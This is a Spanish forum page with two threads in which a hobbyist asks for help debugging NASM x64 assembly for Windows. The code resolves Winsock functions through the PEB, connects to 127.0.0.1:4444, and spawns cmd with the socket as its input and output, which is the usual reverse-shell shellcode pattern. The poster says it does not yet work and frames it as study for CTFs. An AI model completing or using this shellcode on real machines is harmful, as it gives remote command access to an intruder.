| |
 Mostrar Temas
|
|
Páginas: 1 [2]
|
|
11
|
Programación / ASM / Problema con CreateProcessA en nasm.
|
en: 21 Noviembre 2021, 19:19 pm
|
Hola. Tengo un problema tratando de usar CreateProcessA en nasm, he estado intentando hacerlo funcionar, pero no logro que se ejecute bien, primero lo intente de la siguiente manera. mov r13, rdx ;CreateProcessA
xor rdx, rdx
xor r15, r15
mov edx, 0x646d6361
shr edx, 8
push rdx
mov r15, rsp ;cmd
xor rdx, rdx
push rdi ;socket
push rdi ;socket
push rdi ;socket
push rdx
push rdx
xor rax, rax
inc rax
rol rax, 8
push rax ;0x00000100
push rdx
push rdx
push rdx
push rdx
push rdx
push rdx
push rdx
push rdx
push rdx
push rdx
xor rax, rax
add al, 44
push rax
xor r14, r14
mov r14, rsp ;STARTUPINFOA
xor r12, r12
sub rsp, 0x16
mov r12, rsp ;ProcessInfo
sub rsp, 0x58 ;shadowspace
mov [rsp+72], r12 ;ProcessInfo
mov [rsp+64], r14 ;STARTUPINFOA
mov [rsp+56], rdx
mov [rsp+48], rdx
mov [rsp+40], rdx
xor rax, rax
inc rax
mov [rsp+32], rax
xor r8, r8
xor r9, r9
mov rdx, r15 ;cmd
xor rcx, rcx
call r13
Pero creo esta mal alineado entre ProcessInfo y el "shadowspace" que coloqué, la verdad no se si otra vez estoy pisando o borrando el stack, o incluso puede ser que el código este mal. Bueno, así que lo hice de otra manera, que es la siguiente, mov r13, rdx ;CreateProcessA
xor rdx, rdx
xor r15, r15
mov edx, 0x646d6361
shr edx, 8
push rdx
mov r15, rsp ;cmd
xor r12, r12
xor rcx, rcx
xor rdx, rdx
mov rcx, 0x80 ;espacio para STARTUPINFOA y ProcessInfo
lop_nul:
push rdx
loop lop_nul
xor rax, rax
mov al, 44
lea r12, [rsp]
mov [r12], dword eax ;STARTUPINFOA
mov [r12+4], rcx
mov [r12+12], rcx
mov [r12+20], rcx
mov [r12+24], rcx
xor rdx, rdx
mov dl, 255
inc rdx
mov [r12+0x3c], edx ;0x00000100
mov [r12+0x50], rdi ;socket
mov [r12+0x58], rdi ;socket
mov [r12+0x60], rdi ;socket
xor rdx, rdx
sub rsp, 0x58
lea r9, [r12]
mov [rsp+64], r9 ;STARTUPINFOA
lea r9, [r12+104]
mov [rsp+72], r9 ;ProcessInfo
mov [rsp+56], rdx
mov [rsp+48], rdx
mov [rsp+40], rdx
xor rax, rax
inc rax
mov [rsp+32], rax
xor r8, r8
xor r9, r9
mov rdx, r15 ;"cmd"
xor rcx, rcx
call r13 Creo esta mejor alineado, traté de abrir espacio para no pisar nada, pero igual tampoco funcionó, y ya nosé que más debo hacer, me cuesta trabajo alinear a 16 todo, pero no sé si sea eso, o esté mal algún parámetro o estoy pisando y/o borrando algo del stack... ya me bloqué. Espero me puedan ayudar, para ya terminar esto y ponerme a estudiar más sobre seguridad con CTF's y retos, pero mi mente solo está pensando... "y si le sumo, y si le resto y si checo con mod en tal cosa y si cambio el registro" y es horrible  jeje. Bueno, saludos. |
|
|
|
|
12
|
Programación / ASM / Socket en Nasm sobre Winx64, no logro que "connect" funcione
|
en: 16 Noviembre 2021, 21:24 pm
|
Hola Tengo una duda sobre una conexión socket en Nasm usando Windows x64, durante estos días de no poder salir me puse a estudiar ensamblador y me gustó la idea de aprender a usar socket, lo hice inicialmente en el linux, y ahora en Windows, lo hice de esa manera por la razón de Nasm. Bueno, encontré algunas diferencias, en linux se pueden usar los registros básicos, push y call en x86 pero en x64 debes usar RSI y RDI para poder hace un socket, en windows pasa lo mismo, puedes usar registros, y PUSH y hacer CALL, pero al parecer en x64 no se puede, bueno... si se puede, pero no de la misma manera, y los registros que se utilizar para ejecución son RCX, RDX, R8, R9... etc.... Ya con eso hice el muy clásico PEB para encontrar la manera de llegar a la librería ws2_32.dll para después invocar WSAStartup, WSASocketA, etc... Primero hice uno en x86 que funcionó, y luego quise pasarlo a x64, supuse era algo parecido, así que con un debugger fui comparando resultados, todo iba bien hasta que llegué a necesitar AF_INET, como bien saben es lo básico, WSASocketA(2,1,6,0,0,0). Me costó trabajo, pero cuando el debugger me dejó de mostrar error y logré avanzar, no me salió el mismo resultado comparandolo con el de x86, pero luego con el de x86 me di cuenta que no es un resultado constante, así que continué... Obtuve la función connect y meto a la pila AF_INET, puerto e IP, luego abro espacio de la estructura, meto lo guardado en la pila, coloco el descriptor socket y ejecuto connect. Pero por lo que se imaginarán no funciona, obtengo del registro RAX=00000000FFFFFFFF, ya intente varias cosas, busque en google, traté de orientarme del único ejemplo que conseguí de exploit-db, pero no logro saber que hago mal... Les dejo el código completo, por si me pueden ayudar. Aclaro, no soy profesional, ni llevo años en ASM, soyOtroWeyMas que intenta aprender de internet, si pudieran explicarme con palabras no tan de informáticos avanzados, sería genial y por favor. Espero no les moleste.
xor rcx, rcx
mov rcx, 0x4174
push rcx
mov rcx, 0x656b636f53415357 ;WSASocketA
push rcx
mov rdx, rsp
mov rcx, r15
sub rsp, 0x30
call r14
add rsp, 0x40
xor rcx, rcx
mov [rsp+32], rcx
mov [rsp+40], rcx
push rcx
pop r9
mov r8b, 6
inc rcx
mov rdx, rcx
inc rcx
call rax
mov rdi, rax
xor rcx, rcx
mov rcx, 0x7463656e6e6f63
push rcx
mov rdx, rsp
mov rcx, r15
sub rsp, 0x28
call r14
add rsp, 0x30
xor r8, r8
xor rcx, rcx
push dword 0x0100007f
push word 0x5c11
mov cl, 2
push word cx
mov r8b, 16
mov rdx, rsp
mov rcx, rdi
call rax
|
|
|
|
|
|
| |
|
